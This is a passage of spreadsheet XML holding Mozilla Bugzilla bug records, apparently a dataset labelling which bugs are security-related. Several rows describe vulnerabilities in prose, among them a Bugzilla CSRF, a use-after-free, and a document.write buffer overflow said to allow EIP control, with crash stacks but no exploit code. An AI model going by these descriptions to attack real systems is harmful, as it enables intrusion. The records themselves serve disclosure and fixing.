      <c r="I2904" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2904" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K2904" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2904" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2904" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2904" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2904" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2904" t="inlineStr">
        <is>
          <t>[security sensitive after fixed][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q2904" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2904" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2904" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T2904" t="n">
        <v>1</v>
      </c>
      <c r="U2904" t="n">
        <v>0</v>
      </c>
      <c r="V2904" t="n">
        <v>18</v>
      </c>
      <c r="W2904" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #726483 +++
1. load testcase reported in bug 626963 comment 58
2. resize window
3. close window (with the window manager close button)
This bug is about fixing the uaf reported in https://bugzilla.mozilla.org/show_bug.cgi?id=726483#c9
The fix here is not a complete solution to bug 726483.</t>
        </is>
      </c>
      <c r="X2904" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2905">
      <c r="A2905" t="n">
        <v>703975</v>
      </c>
      <c r="B2905" t="inlineStr">
        <is>
          <t>2011-11-20 04:50:51 -0800</t>
        </is>
      </c>
      <c r="C2905" t="inlineStr">
        <is>
          <t>CSRF vulnerability in post_bug.cgi allows possible unauthorized bug creation</t>
        </is>
      </c>
      <c r="D2905" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:56 -0700</t>
        </is>
      </c>
      <c r="E2905" t="n">
        <v>1</v>
      </c>
      <c r="F2905" t="n">
        <v>1</v>
      </c>
      <c r="G2905" t="n">
        <v>4</v>
      </c>
      <c r="H2905" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2905" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2905" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2905" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L2905" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2905" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2905" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2905" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2905" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:high]</t>
        </is>
      </c>
      <c r="Q2905" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2905" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2905" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T2905" t="n">
        <v>1</v>
      </c>
      <c r="U2905" t="n">
        <v>0</v>
      </c>
      <c r="V2905" t="n">
        <v>22</v>
      </c>
      <c r="W2905" t="inlineStr">
        <is>
          <t>Created attachment 575736
POC.html
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Steps to reproduce:
Hello Mozilla Security Team
There is a CSRF vulnerability in the page to send bugs in Bugzilla. When the value "token" is not sent on a "REQUEST" bugzilla does not process correctly, allowing the creation of the bug, with the simple interaction of the User to open a specially crafted page.
Reproduce:
1. Log in Bugzilla
2. Open repro.html
2. See your bug created
Regards,
Mario
Actual results:
The server does not process correctly bugzilla REQUEST and allows for the creation of the exploration bug.
Expected results:
The creation of User BUG without knowing it.</t>
        </is>
      </c>
      <c r="X2905" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2906">
      <c r="A2906" t="n">
        <v>1148628</v>
      </c>
      <c r="B2906" t="inlineStr">
        <is>
          <t>2015-03-27 14:37:38 -0700</t>
        </is>
      </c>
      <c r="C2906" t="inlineStr">
        <is>
          <t>run crontabber under envconsul</t>
        </is>
      </c>
      <c r="D2906" t="inlineStr">
        <is>
          <t>2015-03-31 04:25:05 -0700</t>
        </is>
      </c>
      <c r="E2906" t="n">
        <v>1</v>
      </c>
      <c r="F2906" t="n">
        <v>1</v>
      </c>
      <c r="G2906" t="n">
        <v>4</v>
      </c>
      <c r="H2906" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2906" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2906" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K2906" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2906" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2906" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2906" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2906" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2906" t="inlineStr"/>
      <c r="Q2906" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2906" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2906" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2906" t="n">
        <v>1</v>
      </c>
      <c r="U2906" t="n">
        <v>0</v>
      </c>
      <c r="V2906" t="n">
        <v>2</v>
      </c>
      <c r="W2906" t="inlineStr">
        <is>
          <t>The existing crontabber.sh needs to run the app under envconsul, unless /etc/socorro/crontabber.ini exists in which case we fall back to old behavior (to avoid breaking PHX)</t>
        </is>
      </c>
      <c r="X2906" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2907">
      <c r="A2907" t="n">
        <v>430814</v>
      </c>
      <c r="B2907" t="inlineStr">
        <is>
          <t>2008-04-25 09:06:25 -0700</t>
        </is>
      </c>
      <c r="C2907" t="inlineStr">
        <is>
          <t>Crash [@ nsStyleContext::GetStyleDisplay] while trying to print</t>
        </is>
      </c>
      <c r="D2907" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2907" t="n">
        <v>1</v>
      </c>
      <c r="F2907" t="n">
        <v>1</v>
      </c>
      <c r="G2907" t="n">
        <v>3</v>
      </c>
      <c r="H2907" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2907" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2907" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K2907" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2907" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2907" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2907" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2907" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2907" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2907" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2907" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T2907" t="n">
        <v>1</v>
      </c>
      <c r="U2907" t="n">
        <v>0</v>
      </c>
      <c r="V2907" t="n">
        <v>13</v>
      </c>
      <c r="W2907" t="inlineStr">
        <is>
          <t>See testcase, when clicking on the print button and then printing something,
current trunk builds of Mozilla crash.
http://crash-stats.mozilla.com/report/index/8f00214c-12df-11dd-92b9-001cc4e2bf68?p=1
0  	xul.dll  	nsIFrame::GetStyleDisplay  	 nsStyleStructList.h:95
1 	xul.dll 	nsCSSRendering::PaintBackgroundWithSC 	mozilla/layout/base/nsCSSRendering.cpp:3448
2 	xul.dll 	TableBackgroundPainter::PaintCell 	mozilla/layout/tables/nsTablePainter.cpp:634
3 	xul.dll 	TableBackgroundPainter::PaintRow 	mozilla/layout/tables/nsTablePainter.cpp:590
4 	xul.dll 	TableBackgroundPainter::PaintRowGroup 	mozilla/layout/tables/nsTablePainter.cpp:530
5 	xul.dll 	TableBackgroundPainter::PaintTable 	mozilla/layout/tables/nsTablePainter.cpp:446
6 	xul.dll 	nsTableFrame::PaintTableBorderBackground 	mozilla/layout/tables/nsTableFrame.cpp:1469
7 	xul.dll 	nsDisplayTableBorderBackground::Paint 	mozilla/layout/tables/nsTableFrame.cpp:1318
8 	xul.dll 	nsDisplayList::Paint 	mozilla/layout/base/nsDisplayList.cpp:296
9 	xul.dll 	nsLayoutUtils::PaintFrame 	mozilla/layout/base/nsLayoutUtils.cpp:988
10 	xul.dll 	nsPageFrame::PaintPageContent 	mozilla/layout/generic/nsPageFrame.cpp:562
11 	xul.dll 	PaintPageContent 	mozilla/layout/generic/nsPageFrame.cpp:403
12 	xul.dll 	nsDisplayGeneric::Paint 	mozilla/layout/base/nsDisplayList.h:862
13 	xul.dll 	nsDisplayList::Paint 	mozilla/layout/base/nsDisplayList.cpp:296
14 	xul.dll 	nsLayoutUtils::PaintFrame 	mozilla/layout/base/nsLayoutUtils.cpp:988
15 	xul.dll 	nsSimplePageSequenceFrame::PrintNextPage 	mozilla/layout/generic/nsSimplePageSequence.cpp:647
16 	xul.dll 	nsPrintEngine::PrintPage 	mozilla/layout/printing/nsPrintEngine.cpp:2368
17 	xul.dll 	nsPagePrintTimer::Notify 	mozilla/layout/printing/nsPagePrintTimer.cpp:90
18 	xul.dll 	nsTimerImpl::Fire 	mozilla/xpcom/threads/nsTimerImpl.cpp:403
19 	xul.dll 	nsTimerEvent::Run 	mozilla/xpcom/threads/nsTimerImpl.cpp:490
20 	xul.dll 	nsThread::ProcessNextEvent 	mozilla/xpcom/threads/nsThread.cpp:510
21 	xul.dll 	nsBaseAppShell::Run 	mozilla/widget/src/xpwidgets/nsBaseAppShell.cpp:170
22 	nspr4.dll 	PR_GetEnv 	
23 	firefox.exe 	wmain 	mozilla/toolkit/xre/nsWindowsWMain.cpp:87
24 	firefox.exe 	firefox.exe@0x217f 	
25 	kernel32.dll 	BaseProcessStart</t>
        </is>
      </c>
      <c r="X2907" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2908">
      <c r="A2908" t="n">
        <v>1405563</v>
      </c>
      <c r="B2908" t="inlineStr">
        <is>
          <t>2017-10-03 23:27:34 -0700</t>
        </is>
      </c>
      <c r="C2908" t="inlineStr">
        <is>
          <t>Uptick of failures in Firefox 57: bookmarks fails with "Duplicate entry for &lt;guid&gt; in changeset"</t>
        </is>
      </c>
      <c r="D2908" t="inlineStr">
        <is>
          <t>2018-03-21 15:45:10 -0700</t>
        </is>
      </c>
      <c r="E2908" t="n">
        <v>1</v>
      </c>
      <c r="F2908" t="n">
        <v>1</v>
      </c>
      <c r="G2908" t="n">
        <v>2</v>
      </c>
      <c r="H2908" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2908" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2908" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2908" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2908" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2908" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2908" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2908" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2908" t="inlineStr"/>
      <c r="Q2908" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2908" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2908" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T2908" t="n">
        <v>1</v>
      </c>
      <c r="U2908" t="n">
        <v>0</v>
      </c>
      <c r="V2908" t="n">
        <v>13</v>
      </c>
      <c r="W2908" t="inlineStr">
        <is>
          <t>And I think guid is most often null, but often what appears to be a valid guid.
Appears to start on Sept 9 and accounts for ~30% of the failures, putting it second to bug 1380606.
Probably not a huge deal as 57 has a higher success rate for that engine than 56 or 55, but still worth seeing if there's a sane and simple fix we can upload. I'm marking it as a regression anyway.
https://nbviewer.jupyter.org/gist/mhammond/649a6f6c5606cff0e0d9d8a4f0b9e9a1/Success-Failure-Error%20rates%20per%20engine%2C%20by%20version.ipynb</t>
        </is>
      </c>
      <c r="X2908" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2909">
      <c r="A2909" t="n">
        <v>465241</v>
      </c>
      <c r="B2909" t="inlineStr">
        <is>
          <t>2008-11-16 16:50:20 -0800</t>
        </is>
      </c>
      <c r="C2909" t="inlineStr">
        <is>
          <t>TM: Wrong value for ("0" in [3])</t>
        </is>
      </c>
      <c r="D2909" t="inlineStr">
        <is>
          <t>2009-01-16 00:47:25 -0800</t>
        </is>
      </c>
      <c r="E2909" t="n">
        <v>1</v>
      </c>
      <c r="F2909" t="n">
        <v>1</v>
      </c>
      <c r="G2909" t="n">
        <v>3</v>
      </c>
      <c r="H2909" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2909" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2909" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2909" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2909" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2909" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2909" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2909" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2909" t="inlineStr"/>
      <c r="Q2909" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2909" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2909" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T2909" t="n">
        <v>1</v>
      </c>
      <c r="U2909" t="n">
        <v>0</v>
      </c>
      <c r="V2909" t="n">
        <v>12</v>
      </c>
      <c r="W2909" t="inlineStr">
        <is>
          <t>js&gt; for (let j = 0; j &lt; 5; ++j) print("" + ("0" in [3]));
true
true
false
false
false</t>
        </is>
      </c>
      <c r="X2909" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2910">
      <c r="A2910" t="n">
        <v>680907</v>
      </c>
      <c r="B2910" t="inlineStr">
        <is>
          <t>2011-08-22 08:02:29 -0700</t>
        </is>
      </c>
      <c r="C2910" t="inlineStr">
        <is>
          <t>Can't search without being logged in (because no CSRF token)</t>
        </is>
      </c>
      <c r="D2910" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E2910" t="n">
        <v>1</v>
      </c>
      <c r="F2910" t="n">
        <v>1</v>
      </c>
      <c r="G2910" t="n">
        <v>6</v>
      </c>
      <c r="H2910" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2910" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2910" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K2910" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2910" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2910" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2910" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2910" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2910" t="inlineStr"/>
      <c r="Q2910" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2910" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2910" t="inlineStr">
        <is>
          <t>Builder 0.9.10</t>
        </is>
      </c>
      <c r="T2910" t="n">
        <v>1</v>
      </c>
      <c r="U2910" t="n">
        <v>0</v>
      </c>
      <c r="V2910" t="n">
        <v>4</v>
      </c>
      <c r="W2910" t="inlineStr">
        <is>
          <t>When there is a new browser session (ie no CSRF cookie) and the user is not logged in, searches are coming back with this error message:
Forbidden (403)
CSRF verification failed. Request aborted.
More information is available with DEBUG=True.
To replicate it delete your csrf cookie and perform a search.
The implication of this is that new users to the site cannot search for addons or libraries via the builder.
Zalun suggested the search should be a GET request instead.</t>
        </is>
      </c>
      <c r="X2910" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2911">
      <c r="A2911" t="n">
        <v>583077</v>
      </c>
      <c r="B2911" t="inlineStr">
        <is>
          <t>2010-07-29 14:05:02 -0700</t>
        </is>
      </c>
      <c r="C2911" t="inlineStr">
        <is>
          <t>Buffer overflow due to uniscribe failure on long text runs</t>
        </is>
      </c>
      <c r="D2911" t="inlineStr">
        <is>
          <t>2019-10-11 14:53:43 -0700</t>
        </is>
      </c>
      <c r="E2911" t="n">
        <v>1</v>
      </c>
      <c r="F2911" t="n">
        <v>1</v>
      </c>
      <c r="G2911" t="n">
        <v>3</v>
      </c>
      <c r="H2911" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2911" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2911" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2911" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2911" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2911" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2911" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2911" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2911" t="inlineStr">
        <is>
          <t>[sg:critical?] trunk fixed by 553963 [qa-examined-192] [qa-examined-191]</t>
        </is>
      </c>
      <c r="Q2911" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R2911" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2911" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2911" t="n">
        <v>1</v>
      </c>
      <c r="U2911" t="n">
        <v>2</v>
      </c>
      <c r="V2911" t="n">
        <v>51</v>
      </c>
      <c r="W2911" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
When giving document.write() a MASSIVE message, a buffer overflow occurs and writes data to the Call Stack, eventually causing the EIP to be manipulated by Javascript.
Reproducible: Always
Steps to Reproduce:
1. Open a debugger (I used Debuggy)
2. Visit the web page
3. In the debugger, check the call stack a couple of times
Actual Results:  
I found that 41414141 was written to the call stack, meaning that after normal  browser operations, the EIP becomes 41414141 and that obviously leads to code execution, if you change the EIP to point to your shellcode.
Expected Results:  
The browser should have frozen or crashed.
This was ONLY tested against windows 7 on an x86 single core processor, results may vary.</t>
        </is>
      </c>
      <c r="X2911" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2912">
      <c r="A2912" t="n">
        <v>418926</v>
      </c>
      <c r="B2912" t="inlineStr">
        <is>
          <t>2008-02-21 15:39:40 -0800</t>
        </is>
      </c>
      <c r="C2912" t="inlineStr">
        <is>
          <t>Tracking bug for Build and Release of FF3.0beta4 (Gecko 1.9b4)</t>
        </is>
      </c>
      <c r="D2912" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2912" t="n">
        <v>1</v>
      </c>
      <c r="F2912" t="n">
        <v>1</v>
      </c>
      <c r="G2912" t="n">
        <v>5</v>
      </c>
      <c r="H2912" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2912" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2912" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2912" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2912" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2912" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2912" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2912" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2912" t="inlineStr"/>
      <c r="Q2912" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2912" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2912" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2912" t="n">
        <v>1</v>
      </c>
      <c r="U2912" t="n">
        <v>0</v>
      </c>
      <c r="V2912" t="n">
        <v>40</v>
      </c>
      <c r="W2912" t="inlineStr">
        <is>
          <t>Placeholder bug for the Gecko1.9b4 / FF3.0beta4 release. Waiting for
development codefreeze.</t>
        </is>
      </c>
      <c r="X2912" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2913">
      <c r="A2913" t="n">
        <v>319296</v>
      </c>
      <c r="B2913" t="inlineStr">
        <is>
          <t>2005-12-06 06:25:08 -0800</t>
        </is>
      </c>
      <c r="C2913" t="inlineStr">
        <is>
          <t>memory corruption via QueryInterface() (CVE-2006-0295)</t>
        </is>
      </c>
      <c r="D2913" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2913" t="n">
        <v>1</v>
      </c>
      <c r="F2913" t="n">
        <v>1</v>
      </c>
      <c r="G2913" t="n">
        <v>3</v>
      </c>
      <c r="H2913" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2913" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2913" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2913" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2913" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2913" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2913" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2913" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2913" t="inlineStr">
        <is>
          <t>[sg:critical?] aviary/moz1.7 not vulnerable</t>
        </is>
      </c>
      <c r="Q2913" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2913" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2913" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2913" t="n">
        <v>1</v>
      </c>
      <c r="U2913" t="n">
        <v>0</v>
      </c>
      <c r="V2913" t="n">
        <v>46</v>
      </c>
      <c r="W2913" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051205 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051205 Firefox/1.6a1
QueryInterface on the navigator object triggers memory corruption:
(on both 1.5 and latest cvs trunk on linux)
#7  0x080a9a1f in nsProfileLock::FatalSignalHandler (signo=11)
    at nsProfileLock.cpp:210
#8  &lt;signal handler called&gt;
#9  0xb7e789b4 in nsQueryInterfaceWithError::operator() (this=0xbfffd608, 
    aIID=@0x8ba9ad8, answer=0xbfffd5b4) at nsCOMPtr.cpp:64
#10 0x08929910 in nsCOMPtr&lt;nsIInterfaceRequestor&gt;::assign_from_qi_with_error (
    this=0xbfffd610, qi=@0x6976614e, aIID=@0x80004003) at nsCOMPtr.h:1242
#11 0x0892982a in nsCOMPtr (this=0xbfffd610, qi=@0xbfffd608) at nsCOMPtr.h:653
#12 0xb7e79e83 in nsGetInterface::operator() (this=0xbfffd680, 
    aIID=@0x8c0cb6c, aInstancePtr=0xbfffd640)
    at nsIInterfaceRequestorUtils.cpp:49
#13 0x082bad36 in nsCOMPtr&lt;nsIScriptGlobalObject&gt;::assign_from_helper (
    this=0xbfffd690, helper=@0x6976614e, aIID=@0x80004003) at nsCOMPtr.h:1292
#14 0x082bad0a in nsCOMPtr (this=0xbfffd690, helper=@0xbfffd680)
    at nsCOMPtr.h:694
(gdb) frame 9
#9  0xb7e789b4 in nsQueryInterfaceWithError::operator() (this=0xbfffd608, 
    aIID=@0x8ba9ad8, answer=0xbfffd5b4) at nsCOMPtr.cpp:64
64                                      status = mRawPtr-&gt;QueryInterface(aIID, answer);
(gdb) p mRawPtr
$1 = (class nsISupports *) 0x6976614e
(gdb) p *mRawPtr
Cannot access memory at address 0x6976614e
mRawPtr looks like ascii.
exploitability is not clear at the moment, but with favorable heap layout
it may be possible ala the Window() winblows bug.
testcase to follow.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2913" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2914">
      <c r="A2914" t="n">
        <v>1414797</v>
      </c>
      <c r="B2914" t="inlineStr">
        <is>
          <t>2017-11-06 04:39:57 -0800</t>
        </is>
      </c>
      <c r="C2914" t="inlineStr">
        <is>
          <t>Fix up Mac-specific back button styling after bug 1413499</t>
        </is>
      </c>
      <c r="D2914" t="inlineStr">
        <is>
          <t>2017-11-08 05:00:53 -0800</t>
        </is>
      </c>
      <c r="E2914" t="n">
        <v>1</v>
      </c>
      <c r="F2914" t="n">
        <v>1</v>
      </c>
      <c r="G2914" t="n">
        <v>2</v>
      </c>
      <c r="H2914" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2914" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2914" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K2914" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2914" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2914" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2914" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2914" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2914" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q2914" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2914" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2914" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T2914" t="n">
        <v>1</v>
      </c>
      <c r="U2914" t="n">
        <v>0</v>
      </c>
      <c r="V2914" t="n">
        <v>9</v>
      </c>
      <c r="W2914" t="inlineStr">
        <is>
          <t>Opacity has moved from .toolbarbutton-icon to the button itself.</t>
        </is>
      </c>
      <c r="X2914" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2915">
      <c r="A2915" t="n">
        <v>632206</v>
      </c>
      <c r="B2915" t="inlineStr">
        <is>
          <t>2011-02-07 15:04:46 -0800</t>
        </is>
      </c>
      <c r="C2915" t="inlineStr">
        <is>
          <t>xml_elements writes past the end of the argument vector</t>
        </is>
      </c>
      <c r="D2915" t="inlineStr">
        <is>
          <t>2013-01-14 07:59:36 -0800</t>
        </is>
      </c>
      <c r="E2915" t="n">
        <v>1</v>
      </c>
      <c r="F2915" t="n">
        <v>1</v>
      </c>
      <c r="G2915" t="n">
        <v>3</v>
      </c>
      <c r="H2915" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2915" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2915" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2915" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2915" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2915" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
